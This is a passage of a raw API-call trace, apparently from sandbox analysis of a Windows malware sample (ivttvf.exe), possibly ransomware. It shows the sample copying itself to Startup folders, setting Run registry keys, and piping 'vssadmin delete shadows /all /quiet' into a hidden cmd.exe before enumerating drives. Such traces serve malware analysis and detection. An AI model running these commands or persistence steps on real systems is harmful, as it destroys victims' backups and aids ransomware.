Wow64DisableWow64FsRedirection (in: OldValue=0x18fd9c | out: OldValue=0x18fd9c*=0x1) returned 1 [0264.200] lstrlenW (lpString="kernel32.dll") returned 12 [0264.200] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x619a60 | out: hHeap=0x5e0000) returned 1 [0264.200] lstrlenA (lpString="Wow64DisableWow64FsRedirection") returned 30 [0264.200] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x619a10 | out: hHeap=0x5e0000) returned 1 [0264.200] CreateFileW (lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\ivttvf.exe" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\startup\\ivttvf.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xe0 [0264.200] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\ivttvf.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\ivttvf.exe"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xe4 [0264.201] ReadFile (in: hFile=0xe0, lpBuffer=0x420020, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x18fd98, lpOverlapped=0x0 | out: lpBuffer=0x420020*, lpNumberOfBytesRead=0x18fd98*=0x17200, lpOverlapped=0x0) returned 1 [0264.210] WriteFile (in: hFile=0xe4, lpBuffer=0x420020*, nNumberOfBytesToWrite=0x17200, lpNumberOfBytesWritten=0x18fd98, lpOverlapped=0x0 | out: lpBuffer=0x420020*, lpNumberOfBytesWritten=0x18fd98*=0x17200, lpOverlapped=0x0) returned 1 [0264.213] ReadFile (in: hFile=0xe0, lpBuffer=0x420020, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x18fd98, lpOverlapped=0x0 | out: lpBuffer=0x420020*, lpNumberOfBytesRead=0x18fd98*=0x0, lpOverlapped=0x0) returned 1 [0264.213] CloseHandle (hObject=0xe4) returned 1 [0264.213] CloseHandle (hObject=0xe0) returned 1 [0264.213] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x614bb0 [0264.213] RtlReAllocateHeap (Heap=0x5e0000, Flags=0x0, Ptr=0x614bb0, Size=0x20) returned 0x619a10 [0264.213] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x614bb0 [0264.213] RtlReAllocateHeap (Heap=0x5e0000, Flags=0x0, Ptr=0x614bb0, Size=0x20) returned 0x619a60 [0264.213] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76e20000 [0264.213] GetProcAddress (hModule=0x76e20000, lpProcName="Wow64DisableWow64FsRedirection") returned 0x76e4d650 [0264.213] Wow64DisableWow64FsRedirection (in: OldValue=0x18fd9c | out: OldValue=0x18fd9c*=0x1) returned 1 [0264.213] lstrlenW (lpString="kernel32.dll") returned 12 [0264.213] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x619a60 | out: hHeap=0x5e0000) returned 1 [0264.213] lstrlenA (lpString="Wow64DisableWow64FsRedirection") returned 30 [0264.213] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x619a10 | out: hHeap=0x5e0000) returned 1 [0264.213] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x420020 | out: hHeap=0x5e0000) returned 1 [0264.218] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x614bb0 [0264.218] RtlReAllocateHeap (Heap=0x5e0000, Flags=0x0, Ptr=0x614bb0, Size=0x20) returned 0x619a10 [0264.218] RtlReAllocateHeap (Heap=0x5e0000, Flags=0x0, Ptr=0x619a10, Size=0x40) returned 0x61ab28 [0264.218] RtlReAllocateHeap (Heap=0x5e0000, Flags=0x0, Ptr=0x61ab28, Size=0x80) returned 0x65ed30 [0264.218] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\ivttvf.exe") returned 56 [0264.218] lstrlenW (lpString="Software\\Microsoft\\Windows\\CurrentVersion\\Run") returned 45 [0264.218] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x5c) returned 0x61bf98 [0264.218] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Run", ulOptions=0x0, samDesired=0x20106, phkResult=0x18fd6c | out: phkResult=0x18fd6c*=0xe0) returned 0x0 [0264.218] RegSetValueExW (hKey=0xe0, lpValueName="ivttvf.exe", Reserved=0x0, dwType=0x1, lpData=0x61ecf8, cbData=0x70) returned 0x5 [0264.218] RegCloseKey (hKey=0xe0) returned 0x0 [0264.218] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x61bf98 | out: hHeap=0x5e0000) returned 1 [0264.218] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\ivttvf.exe") returned 56 [0264.218] lstrlenW (lpString="Software\\Microsoft\\Windows\\CurrentVersion\\Run") returned 45 [0264.218] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x5c) returned 0x61bf98 [0264.218] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Run", ulOptions=0x0, samDesired=0x20106, phkResult=0x18fd6c | out: phkResult=0x18fd6c*=0xe4) returned 0x0 [0264.218] RegSetValueExW (in: hKey=0xe4, lpValueName="ivttvf.exe", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\ivttvf.exe", cbData=0x70 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\ivttvf.exe") returned 0x0 [0264.219] RegCloseKey (hKey=0xe4) returned 0x0 [0264.219] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x61bf98 | out: hHeap=0x5e0000) returned 1 [0264.219] lstrlenW (lpString="Software\\Microsoft\\Windows\\CurrentVersion\\Run") returned 45 [0264.219] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x65ed30 | out: hHeap=0x5e0000) returned 1 [0264.219] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xfffe) returned 0x63ed08 [0264.219] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xfffe) returned 0x64ed10 [0264.219] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x614be0 [0264.219] RtlReAllocateHeap (Heap=0x5e0000, Flags=0x0, Ptr=0x614be0, Size=0x20) returned 0x619a10 [0264.219] RtlReAllocateHeap (Heap=0x5e0000, Flags=0x0, Ptr=0x619a10, Size=0x40) returned 0x61ab28 [0264.219] RtlReAllocateHeap (Heap=0x5e0000, Flags=0x0, Ptr=0x61ab28, Size=0x80) returned 0x65ed30 [0264.219] RtlReAllocateHeap (Heap=0x5e0000, Flags=0x0, Ptr=0x65ed30, Size=0x100) returned 0x61bcb0 [0264.219] lstrlenW (lpString="") returned 0 [0264.219] lstrlenW (lpString="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders") returned 69 [0264.219] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x8c) returned 0x61bdb8 [0264.219] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders", ulOptions=0x0, samDesired=0x20119, phkResult=0x18fd18 | out: phkResult=0x18fd18*=0xe4) returned 0x0 [0264.219] RegQueryValueExW (in: hKey=0xe4, lpValueName="Startup", lpReserved=0x0, lpType=0x18fd24, lpData=0x64ed10, lpcbData=0x18fd50*=0x7fff | out: lpType=0x18fd24*=0x0, lpData=0x64ed10*=0x53, lpcbData=0x18fd50*=0x7fff) returned 0x2 [0264.219] RegCloseKey (hKey=0xe4) returned 0x0 [0264.219] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x61bdb8 | out: hHeap=0x5e0000) returned 1 [0264.219] lstrlenW (lpString="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders") returned 69 [0264.219] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x8c) returned 0x61bdb8 [0264.219] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders", ulOptions=0x0, samDesired=0x20119, phkResult=0x18fd18 | out: phkResult=0x18fd18*=0xe4) returned 0x0 [0264.219] RegQueryValueExW (in: hKey=0xe4, lpValueName="Startup", lpReserved=0x0, lpType=0x18fd24, lpData=0x64ed10, lpcbData=0x18fd50*=0x7fff | out: lpType=0x18fd24*=0x2, lpData="%USERPROFILE%\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup", lpcbData=0x18fd50*=0x98) returned 0x0 [0264.219] RegCloseKey (hKey=0xe4) returned 0x0 [0264.219] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x61bdb8 | out: hHeap=0x5e0000) returned 1 [0264.219] lstrlenW (lpString="%USERPROFILE%\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup") returned 75 [0264.219] lstrlenW (lpString="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders") returned 69 [0264.219] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x61bcb0 | out: hHeap=0x5e0000) returned 1 [0264.219] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\ivttvf.exe", lpDst=0x63ed08, nSize=0x7fff | out: lpDst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\ivttvf.exe") returned 0x67 [0264.219] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x64ed10 | out: hHeap=0x5e0000) returned 1 [0264.219] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x63ed08 | out: hHeap=0x5e0000) returned 1 [0264.219] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x100000) returned 0x420020 [0264.220] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x614be0 [0264.220] RtlReAllocateHeap (Heap=0x5e0000, Flags=0x0, Ptr=0x614be0, Size=0x20) returned 0x619a10 [0264.220] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x614be0 [0264.220] RtlReAllocateHeap (Heap=0x5e0000, Flags=0x0, Ptr=0x614be0, Size=0x20) returned 0x619a60 [0264.220] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76e20000 [0264.220] GetProcAddress (hModule=0x76e20000, lpProcName="Wow64DisableWow64FsRedirection") returned 0x76e4d650 [0264.220] Wow64DisableWow64FsRedirection (in: OldValue=0x18fd9c | out: OldValue=0x18fd9c*=0x1) returned 1 [0264.220] lstrlenW (lpString="kernel32.dll") returned 12 [0264.220] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x619a10 | out: hHeap=0x5e0000) returned 1 [0264.220] lstrlenA (lpString="Wow64DisableWow64FsRedirection") returned 30 [0264.220] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x619a60 | out: hHeap=0x5e0000) returned 1 [0264.220] CreateFileW (lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\ivttvf.exe" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\startup\\ivttvf.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xe4 [0264.220] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\ivttvf.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\startup\\ivttvf.exe"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0264.220] CloseHandle (hObject=0xe4) returned 1 [0264.220] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x614be0 [0264.220] RtlReAllocateHeap (Heap=0x5e0000, Flags=0x0, Ptr=0x614be0, Size=0x20) returned 0x619a60 [0264.220] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x614be0 [0264.220] RtlReAllocateHeap (Heap=0x5e0000, Flags=0x0, Ptr=0x614be0, Size=0x20) returned 0x619a10 [0264.220] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76e20000 [0264.220] GetProcAddress (hModule=0x76e20000, lpProcName="Wow64DisableWow64FsRedirection") returned 0x76e4d650 [0264.220] Wow64DisableWow64FsRedirection (in: OldValue=0x18fd9c | out: OldValue=0x18fd9c*=0x1) returned 1 [0264.220] lstrlenW (lpString="kernel32.dll") returned 12 [0264.220] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x619a10 | out: hHeap=0x5e0000) returned 1 [0264.220] lstrlenA (lpString="Wow64DisableWow64FsRedirection") returned 30 [0264.220] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x619a60 | out: hHeap=0x5e0000) returned 1 [0264.220] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x420020 | out: hHeap=0x5e0000) returned 1 [0264.221] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xfffe) returned 0x63ed08 [0264.221] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xfffe) returned 0x64ed10 [0264.221] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x614be0 [0264.221] RtlReAllocateHeap (Heap=0x5e0000, Flags=0x0, Ptr=0x614be0, Size=0x20) returned 0x619a60 [0264.221] RtlReAllocateHeap (Heap=0x5e0000, Flags=0x0, Ptr=0x619a60, Size=0x40) returned 0x61ab28 [0264.221] RtlReAllocateHeap (Heap=0x5e0000, Flags=0x0, Ptr=0x61ab28, Size=0x80) returned 0x65ed30 [0264.221] RtlReAllocateHeap (Heap=0x5e0000, Flags=0x0, Ptr=0x65ed30, Size=0x100) returned 0x61bcb0 [0264.221] lstrlenW (lpString="") returned 0 [0264.221] lstrlenW (lpString="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders") returned 69 [0264.221] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x8c) returned 0x61bdb8 [0264.221] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders", ulOptions=0x0, samDesired=0x20119, phkResult=0x18fd18 | out: phkResult=0x18fd18*=0xe4) returned 0x0 [0264.221] RegQueryValueExW (in: hKey=0xe4, lpValueName="Common Startup", lpReserved=0x0, lpType=0x18fd24, lpData=0x64ed10, lpcbData=0x18fd50*=0x7fff | out: lpType=0x18fd24*=0x2, lpData="%ProgramData%\\Microsoft\\Windows\\Start Menu\\Programs\\Startup", lpcbData=0x18fd50*=0x78) returned 0x0 [0264.221] RegCloseKey (hKey=0xe4) returned 0x0 [0264.221] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x61bdb8 | out: hHeap=0x5e0000) returned 1 [0264.221] lstrlenW (lpString="%ProgramData%\\Microsoft\\Windows\\Start Menu\\Programs\\Startup") returned 59 [0264.221] lstrlenW (lpString="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders") returned 69 [0264.221] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x61bcb0 | out: hHeap=0x5e0000) returned 1 [0264.221] ExpandEnvironmentStringsW (in: lpSrc="%ProgramData%\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\ivttvf.exe", lpDst=0x63ed08, nSize=0x7fff | out: lpDst="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\ivttvf.exe") returned 0x48 [0264.221] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x64ed10 | out: hHeap=0x5e0000) returned 1 [0264.221] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x63ed08 | out: hHeap=0x5e0000) returned 1 [0264.221] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x100000) returned 0x420020 [0264.221] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x614be0 [0264.221] RtlReAllocateHeap (Heap=0x5e0000, Flags=0x0, Ptr=0x614be0, Size=0x20) returned 0x619a60 [0264.221] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x614be0 [0264.221] RtlReAllocateHeap (Heap=0x5e0000, Flags=0x0, Ptr=0x614be0, Size=0x20) returned 0x619a10 [0264.221] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76e20000 [0264.221] GetProcAddress (hModule=0x76e20000, lpProcName="Wow64DisableWow64FsRedirection") returned 0x76e4d650 [0264.221] Wow64DisableWow64FsRedirection (in: OldValue=0x18fd9c | out: OldValue=0x18fd9c*=0x1) returned 1 [0264.221] lstrlenW (lpString="kernel32.dll") returned 12 [0264.221] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x619a60 | out: hHeap=0x5e0000) returned 1 [0264.221] lstrlenA (lpString="Wow64DisableWow64FsRedirection") returned 30 [0264.221] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x619a10 | out: hHeap=0x5e0000) returned 1 [0264.221] CreateFileW (lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\ivttvf.exe" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\startup\\ivttvf.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xe4 [0264.222] CreateFileW (lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\ivttvf.exe" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\startup\\ivttvf.exe"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0264.222] CloseHandle (hObject=0xe4) returned 1 [0264.222] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x614be0 [0264.222] RtlReAllocateHeap (Heap=0x5e0000, Flags=0x0, Ptr=0x614be0, Size=0x20) returned 0x619a10 [0264.222] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x614be0 [0264.222] RtlReAllocateHeap (Heap=0x5e0000, Flags=0x0, Ptr=0x614be0, Size=0x20) returned 0x619a60 [0264.222] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76e20000 [0264.222] GetProcAddress (hModule=0x76e20000, lpProcName="Wow64DisableWow64FsRedirection") returned 0x76e4d650 [0264.222] Wow64DisableWow64FsRedirection (in: OldValue=0x18fd9c | out: OldValue=0x18fd9c*=0x1) returned 1 [0264.222] lstrlenW (lpString="kernel32.dll") returned 12 [0264.222] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x619a60 | out: hHeap=0x5e0000) returned 1 [0264.222] lstrlenA (lpString="Wow64DisableWow64FsRedirection") returned 30 [0264.222] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x619a10 | out: hHeap=0x5e0000) returned 1 [0264.222] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x420020 | out: hHeap=0x5e0000) returned 1 [0264.222] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x61ecf8 | out: hHeap=0x5e0000) returned 1 [0264.222] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x62ed00 | out: hHeap=0x5e0000) returned 1 [0264.222] lstrlenW (lpString="%windir%\\System32") returned 17 [0264.222] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x61aa98 | out: hHeap=0x5e0000) returned 1 [0264.222] lstrlenW (lpString="%appdata%") returned 9 [0264.222] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x5f44e0 | out: hHeap=0x5e0000) returned 1 [0264.222] lstrlenW (lpString="%sh(Startup)%") returned 13 [0264.222] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x5f44b8 | out: hHeap=0x5e0000) returned 1 [0264.222] lstrlenW (lpString="%sh(Common Startup)%") returned 20 [0264.222] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x61aae0 | out: hHeap=0x5e0000) returned 1 [0264.222] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x614be0 [0264.223] RtlReAllocateHeap (Heap=0x5e0000, Flags=0x0, Ptr=0x614be0, Size=0x20) returned 0x5f44b8 [0264.223] RtlReAllocateHeap (Heap=0x5e0000, Flags=0x0, Ptr=0x5f44b8, Size=0x40) returned 0x61aae0 [0264.223] RtlReAllocateHeap (Heap=0x5e0000, Flags=0x0, Ptr=0x61aae0, Size=0x80) returned 0x65ed30 [0264.223] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x614be0 [0264.223] RtlReAllocateHeap (Heap=0x5e0000, Flags=0x0, Ptr=0x614be0, Size=0x20) returned 0x5f44b8 [0264.223] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x1fffc) returned 0x61ecf8 [0264.223] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xfffe) returned 0x63ed00 [0264.223] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xfffe) returned 0x64ed08 [0264.223] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x614be0 [0264.223] RtlReAllocateHeap (Heap=0x5e0000, Flags=0x0, Ptr=0x614be0, Size=0x20) returned 0x5f44e0 [0264.223] RtlReAllocateHeap (Heap=0x5e0000, Flags=0x0, Ptr=0x5f44e0, Size=0x40) returned 0x61aae0 [0264.223] RtlReAllocateHeap (Heap=0x5e0000, Flags=0x0, Ptr=0x61aae0, Size=0x80) returned 0x65edb8 [0264.223] RtlReAllocateHeap (Heap=0x5e0000, Flags=0x0, Ptr=0x65edb8, Size=0x100) returned 0x61bcb0 [0264.223] lstrlenW (lpString="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders") returned 69 [0264.223] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x61bcb0 | out: hHeap=0x5e0000) returned 1 [0264.223] ExpandEnvironmentStringsW (in: lpSrc="%comspec%", lpDst=0x63ed00, nSize=0x7fff | out: lpDst="C:\\Windows\\system32\\cmd.exe") returned 0x1c [0264.223] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x64ed08 | out: hHeap=0x5e0000) returned 1 [0264.223] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x63ed00 | out: hHeap=0x5e0000) returned 1 [0264.224] CreatePipe (in: hReadPipe=0x18fd58, hWritePipe=0x18fd5c, lpPipeAttributes=0x18fd48, nSize=0x0 | out: hReadPipe=0x18fd58*=0xe8, hWritePipe=0x18fd5c*=0xec) returned 1 [0264.234] CreatePipe (in: hReadPipe=0x18fdc8, hWritePipe=0x18fdcc, lpPipeAttributes=0x18fd48, nSize=0x0 | out: hReadPipe=0x18fdc8*=0xf0, hWritePipe=0x18fdcc*=0xf4) returned 1 [0264.234] SetHandleInformation (hObject=0xec, dwMask=0x1, dwFlags=0x0) returned 1 [0264.234] SetHandleInformation (hObject=0xf0, dwMask=0x1, dwFlags=0x0) returned 1 [0264.234] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\cmd.exe", lpCommandLine=0x0, lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x0, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x18fd68*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x101, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0xe8, hStdOutput=0xf4, hStdError=0xf4), lpProcessInformation=0x18fdb8 | out: lpCommandLine=0x0, lpProcessInformation=0x18fdb8*(hProcess=0xfc, hThread=0xf8, dwProcessId=0x540, dwThreadId=0x544)) returned 1 [0264.423] lstrlenA (lpString="mode con cp select=1251\nvssadmin delete shadows /all /quiet\nExit\n") returned 65 [0264.423] WriteFile (in: hFile=0xec, lpBuffer=0x65ed30*, nNumberOfBytesToWrite=0x41, lpNumberOfBytesWritten=0x18fd64, lpOverlapped=0x0 | out: lpBuffer=0x65ed30*, lpNumberOfBytesWritten=0x18fd64*=0x41, lpOverlapped=0x0) returned 1 [0264.423] CloseHandle (hObject=0xfc) returned 1 [0264.423] CloseHandle (hObject=0xf8) returned 1 [0264.423] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x61ecf8 | out: hHeap=0x5e0000) returned 1 [0264.423] lstrlenA (lpString="mode con cp select=1251\nvssadmin delete shadows /all /quiet\nExit\n") returned 65 [0264.423] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x65ed30 | out: hHeap=0x5e0000) returned 1 [0264.423] lstrlenW (lpString="%comspec%") returned 9 [0264.423] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x5f44b8 | out: hHeap=0x5e0000) returned 1 [0264.423] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x40a530, lpParameter=0x0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0xf8 [0264.559] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xc) returned 0x614be0 [0264.605] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x40a710, lpParameter=0x614be0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0xfc [0264.609] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x8) returned 0x619358 [0264.609] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x4098e0, lpParameter=0x619358, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x104 [0264.609] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x614bf8 [0264.609] RtlReAllocateHeap (Heap=0x5e0000, Flags=0x0, Ptr=0x614bf8, Size=0x20) returned 0x5f44b8 [0264.609] RtlReAllocateHeap (Heap=0x5e0000, Flags=0x0, Ptr=0x5f44b8, Size=0x40) returned 0x61aae0 [0264.609] lstrlenW (lpString="ABCDEFGHIJKLMNOPQRSTUVWXYZ") returned 26 [0264.609] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xd0) returned 0x61bcb0 [0264.609] GetLogicalDrives () returned 0x4 [0264.610] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10014) returned 0x61ecf8 [0264.610] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x614bf8 [0264.610] RtlReAllocateHeap (Heap=0x5e0000, Flags=0x0, Ptr=0x614bf8, Size=0x20) returned 0x5f44b8 [0264.610] RtlReAllocateHeap (Heap=0x5e0000, Flags=0x0, Ptr=0x5f44b8, Size=0x40) returned 0x61ab70 [0264.610] RtlReAllocateHeap (Heap=0x5e0000, Flags=0x0, Ptr=0x61ab70, Size=0x80) returned 0x65ed30 [0264.610] RtlReAllocateHeap (Heap=0x5e0000, Flags=0x0, Ptr=0x65ed30, Size=0x100) returned 0x61d8c0 [0264.610] RtlReAllocateHeap (Heap=0x5e0000, Flags=0x0, Ptr=0x61d8c0, Size=0x200) returned 0x61d8c0 [0264.610] RtlReAllocateHeap (Heap=0x5e0000, Flags=0x0, Ptr=0x61d8c0, Size=0x400) returned 0x61d2a8 [0264.610] RtlReAllocateHeap (Heap=0x5e0000, Flags=0x0, Ptr=0x61d2a8, Size=0x800) returned 0x660d18 [0264.610] RtlReAllocateHeap (Heap=0x5e0000, Flags=0x0, Ptr=0x660d18, Size=0x1000) returned 0x660d18 [0264.610] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10000) returned 0x62ed18 [0264.610] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x614bf8 [0264.610] 